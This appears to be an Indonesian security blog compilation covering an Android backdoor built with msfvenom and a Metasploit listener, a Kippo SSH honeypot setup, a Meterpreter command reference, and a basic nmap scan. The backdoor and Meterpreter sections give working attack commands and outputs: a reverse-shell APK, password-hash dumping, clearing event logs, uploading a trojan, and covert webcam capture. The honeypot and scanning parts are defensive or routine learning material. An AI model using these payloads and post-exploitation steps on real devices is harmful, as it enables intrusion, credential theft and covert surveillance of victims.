Pwnd

How to launch Backdoor android menggunakan metasploit dengan cara yang sangat simpel, dan ini hanya konsep saja. Pengiriman backdoor ke victim yaitu hp android saya sendiri menggunakan aplikasi xender.

Pertama buat dulu payload…

#msfvenom -p android/meterpreter/reverse_tcp LHOST=”IP Address” LPORT=”Port” R > namafile.apk

Skip… upload payload tadi ke hp dan install

Sekarang membuat listener-nya

#msfconsole
#use multi/handler
#set PAYLOAD android/meterpreter/reverse_tcp
#set LHOST “IP address”
#set LPORT “Port”
#exploit

dan tunggu backdoor tadi di excute pada hp android, apabila sudah di excute maka kita akan masuk ke sesi meterpreter….

Setelah itu, ketik ? atau help untuk mengetahui apa saja command yang tersedia.
https://openload.co/embed/q0FH7fMBTwM/First.mkv.mp4

SSH Honeypot

Catatan kesekian, 3 minggu sebelum ujikom (project work) pukul 10.56PM waktu komputer saya. Saya menambahkan fitur ssh honeypot menggunakan kippo di server debian, dalam judul tugas akhir (project work) Keamanan Jaringan.

Sebelum itu, sedikit penjelasan mengenai honeypot: In computer terminology, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of data (for example, in a network site) that appears to be a legitimate part of the site but is actually isolated and monitored, and that seems to contain information or a resource of value to attackers, which are then blocked. This is similar to the police baiting a criminal and then conducting undercover surveillance, and finally punishing the criminal. Wikipedia

Contoh hasil setup ssh Honeypot di server saya (debian) menggunakan Kippo

kippo
Instalasi dan Konfigurasi Kippo

Pertama, install python twisted.

apt-get install python-twisted

kedua, edit port ssh (bebas) contoh saya ubah ke port 69

nano /etc/ssh/sshd_config

cari kalo pake nano ctrl+w port dan ubah portnya

[...]
Port 69
[...]

Restart service ssh

Ketiga, tambah user baru (terserah) contoh uwa

adduser uwa

Logout, dan login kembali menggunakan user uwa.
Kemudian download Kippo.

$ wget http://kippo.googlecode.com/files/kippo-0.8.tar.gz

Extract dengan perintah

$ tar xzf kippo-0.8.tar.gz

Masuk ke folder kippo, dan lihat isinya… ada:

data  dl  doc  fs.pickle  honeyfs  kippo  kippo.cfg  kippo.tac    log  start.sh  txtcmds    utils

oh iya, tambah rule iptables untuk redirect port 22 ke 2222 (default port Kippo)

# iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT --to-port 2222

Terakhir start service kippo dengan perintah (didalam folder kippo) dan jangan pake user root pake uwa (contoh) atau apapun terserah.

$ ./start.sh

Untuk log nya, lihat di folder log.

Daftar Command Di Meterpreter

 

help

Perintah ‘help’, yang mungkin diperlukan, untuk menampilkan menu bantuan meterpreter.

meterpreter > help

Core Commands
=============

Command Description
——- ———–
? Help menu
background Backgrounds the current session
channel Displays information about active channels
…snip…

 

background

Perintah ‘ background ‘ mengembalikan kita kepada prompt msf/prompt sebelum exploit dijalankan.

meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

 

cat

Perintah ‘ cat ‘ digunakan untuk membaca sebuah file.

meterpreter > cat namafile.txt

 

cd & pwd

Perintag cd’ & perintah pwd’ digunakan untuk mengubah dan menampilkan saat bekerja langsung pada host target.
Perubahan direktori cd” bekerja dengan cara yang sama seperti halnya di bawah DOS dan Unix sistem.
Secara default, folder bekerja saat ini adalah di mana sambungan ke Listener Anda dimulai.
ARGUMEN:

cd: Path of the folder to change to
pwd: None required

Contoh penggunaan:

meterpreter > pwd
c:
meterpreter > cd c:windows
meterpreter > pwd
c:windows
meterpreter >

 

clearev

Perintah clearev’ akan menghapus aplikasi, Sistem dan log Keamanan pada sistem Window. 
 

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter > 

 

download

Perintah ‘ download ‘ adalah untuk mendownload file dari komputer victim, dan gunakan double-slashes ( \ )untuk menetapkan direktori.

meterpreter > download c:\boot.ini
[*] downloading: c:boot.ini -> c:boot.ini
[*] downloaded : c:boot.ini -> c:boot.ini/boot.ini
meterpreter >

 

edit

Perintah ‘editmembuka file yang terletak pada host target.
Ia menggunakan vim’ sehingga semua perintah editor tersedia.
meterpreter > ls

Listing: C:Documents and SettingsAdministratorDesktop
========================================================

Mode Size Type Last modified Name
—- —- —- ————- —-
.
…snip…
.
100666/rw-rw-rw- 0 fil 2012-03-01 13:47:10 -0500 edit.txt

meterpreter > edit edit.txt

 

excute

Perintah ‘ execute ‘ adalah untuk menjalankan aplikasi para komputer victim.

meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

 

getuid

Perintah ‘ getuid ‘ adalah untuk menampilkan hostname dari komputer victim.

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

 

hashdump

The hashdumpmodul posting yang akan membuang isi database SAM.

meterpreter > run post/windows/gather/hashdump 

[*] Obtaining the boot key…
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6…
[*] Obtaining the user list and keys…
[*] Decrypting user keys…
[*] Dumping password hashes…

Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >

idletime

Perintah ‘ idletime ‘ adalah perintah untuk mengetahui lama waktu dari pemakaian komputer.

meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
meterpreter >

ipconfig

ipconfig’ perintah ini berfungsi menampilkan interface jaringan dan alamat pada mesin victim.

meterpreter > ipconfig

MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0

AMD PCNET Family PCI Ethernet Adapter – Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0

meterpreter >

 

ls

Seperti di Linux, perintah ls’ akan menampilkan daftar file dalam direktori pada mesin victim saat ini.
meterpreter > ls

Listing: C:Documents and Settingsvictim
=========================================

Mode Size Type Last modified Name
—- —- —- ————- —-
40777/rwxrwxrwx 0 dir Sat Oct 17 07:40:45 -0600 2009 .
40777/rwxrwxrwx 0 dir Fri Jun 19 13:30:00 -0600 2009 ..
100666/rw-rw-rw- 218 fil Sat Oct 03 14:45:54 -0600 2009 .recently-used.xbel
40555/r-xr-xr-x 0 dir Wed Nov 04 19:44:05 -0700 2009 Application Data
…snip…

 

migrate

Perintah ‘ migrate ‘ digunakan untuk berpindah pada proses yang lain.

meterpreter > run post/windows/manage/migrate 

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe…
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >

 

shell

Perintah ‘ shell ‘ adalah perintah untuk mendapatkan shell dari komputer victim(biasanya command Prompt Untuk Windows).

meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

upload

Perintah ‘ upload ‘ adalah untuk mengupload file kedalam komputer victim(biasanya backdoor), dan gunakan double-slashes.

meterpreter > upload evil_trojan.exe c:\windows\system32
[*] uploading  : evil_trojan.exe -> c:windowssystem32
[*] uploaded   : evil_trojan.exe -> c:windowssystem32evil_trojan.exe
meterpreter >

 

webcam_list

Perintah webcam_list‘  dijalankan dari shell meterpreter, akan menampilkan web cam yang tersedia pada host target.

meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
meterpreter >

 

webcam_snap

Perintah webcam_snap” adalah untuk mengambil gambar dari web cam terhubung pada sistem target, dan menyimpannya ke disk sebagai gambar JPEG. Secara default, menyimpan lokasi direktori yang aktif dengan nama file acak.
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.

OPTIONS:

-h Help Banner
-i The index of the webcam to use (Default: 1)
-p The JPEG image path (Default: ‘gnFjTnzi.jpeg’)
-q The JPEG image quality (Default: ’50’)
-v Automatically view the JPEG image (Default: ‘true’)

meterpreter >

Option:

-h: Menampilkan informasi bantuan untuk perintah
-i opt: Jika lebih dari 1 web cam terhubung, gunakan opsi ini untuk memilih perangkat untuk men-capture gambar
p opt: Ganti path dan nama file gambar yang akan disimpan
q opt: kualitas gambar, 50(default) / pengaturan media, 100 kualitas terbaik
v opt: Secara default value-nya true, yang akan membuka gambar setelah penangkapan.

Source: http://www.offensive-security.com

Scanning Host Menggunakan Nmap

Apa yang itu nmap?

Nmap (Network Mapper) adalah sebuah aplikasi atau tool yang berfungsi untuk melakukan port scanning. Nmap dibuat oleh Gordon Lyon, atau lebih dikenal dengan nama Fyodor Vaskovich. Aplikasi ini digunakan untuk meng-audit jaringan yang ada. Dengan menggunakan tool ini, kita dapat melihat host yang aktif, port yang terbuka, Sistem Operasi yang digunakan, dan feature-feature scanning lainnya. Pada awalnya, Nmap hanya bisa berjalan di sistem operasi Linux, namun dalam perkembangannya sekarang ini, hampir semua sistem operasi bisa menjalankan Nmap. (wikipedia.org)

Bagaimana cara install nmap?

Nmap tersedia di berbagai sistem operasi mulai dari Unix, Linux hingga Windows. Silahkan unduh di situs resmi nya http://nmap.org. Dan untuk install guide nya bisa anda baca di https://nmap.org/book/install.html

Penggunaan

Berdasarkan rilis yang dikeluarkan oleh nmap.org, penggunaan Nmap sesuai dengan apa yag kita butuhkan. Bila kita menggunakan Nmap untuk melihat port yang terbuka, maka perintahnya akan berbeda dengan perintah bila kita ingin menggunakan Nmap untuk melihat host yang aktif. Bentuk dasar dari perintah Nmap adalah :
“nmap “
Untuk optionnya, silakan gunakan perintah :
“nmap –help”

Contoh:

Disini saya akan berbagi cara sederhana untuk scan host yang up pada sebuah jaringan.

Catatan: saya menggunakan os Linux yang sudah terinstall nmap

Buka terminal, dan ketik perintah:

namp –sP 192.168.1.0/24 

*192.168.1.0 adalah ip network saya dengan prefix /24

Output:

Untuk referensi panduan penggunaan nmap, bisa anda baca di https://nmap.org/man/id/